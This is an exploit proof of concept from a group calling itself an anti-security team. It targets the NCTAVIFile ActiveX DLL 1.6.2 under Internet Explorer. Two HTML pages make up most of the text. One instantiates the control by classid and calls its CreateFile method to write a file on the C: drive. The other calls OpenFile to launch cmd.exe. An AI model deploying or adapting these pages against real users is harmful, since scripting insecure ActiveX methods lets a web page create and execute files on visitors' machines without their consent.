"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
"""  :::::: ::   ::       ::        ::  ::  ::::        """
"""  ::      :: ::        :: :::::: .. ::::   ::        """
"""  :::::    :::   ::::: :: ::  :: ::  ::  ::::        """
"""  ::      :: ::  ::  : :: ::  :: ::  ::    ::        """
"""  :::::: ::   :: ::::: :: :::::: ::  ::  :::: rs.ir  """
"""                 ::                                  """
"""                                                     """
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
   Anti-Security Research Team & Security Institute

#[+] Bug : NCTAVIFile Activex DLL V 1.6.2 Insecure Method File Creation/File execution exploit
#[+] program  Download : http://www.nctsoft.com/
#[+] Author : the_Edit0r
#[+] Contact me : the_3dit0r[at]Yahoo[dot]coM
#[+] Greetz to all my friends
#[+] Tested on: Windows XP Pro SP2 with Internet Explorer 7
#[+] web site: Expl0iters.ir  * Anti-security.ir
#[+] Big thnx: Aria-Security Team & H4ckcity Member

# Part Expl0it & Bug Codes ( Poc ) : 
------------------------------------

<HTML>
<b> NCTAVIFile Activex DLL V 1.6.2 Insecure Method File Creation </b>

<BODY>
<object classid='clsid:6B1E11AC-BF5C-4CF5-9DC9-F81F715EB790' id='expl'></object>
<SCRIPT>

/*
targetFile = "C:\WINDOWS\system32\NCTAVIFile.dll"
prototype  = "Sub CreateFile ( ByVal fileName As String )"
memberName = "CreateFile"
progid     = "NCTAVIFileLib.AVIFileM"
argCount   = 1
*/

function Boom()
 {
     File = "c:\\system_.ini"
   expl.CreateFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=Boom() type=button value="Click Here For Test Exploit">
</body>
</HTML>

---------------------------------------

<HTML>
<BODY>
 <object id=expl classid="clsid:{6B1E11AC-BF5C-4CF5-9DC9-F81F715EB790}"></object>

<SCRIPT>

function Do_it()
 {
   File = "c:\\windows\\system32\\cmd.exe"
   expl.OpenFile(File)
 }


</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="exploit">

</body>
</HTML>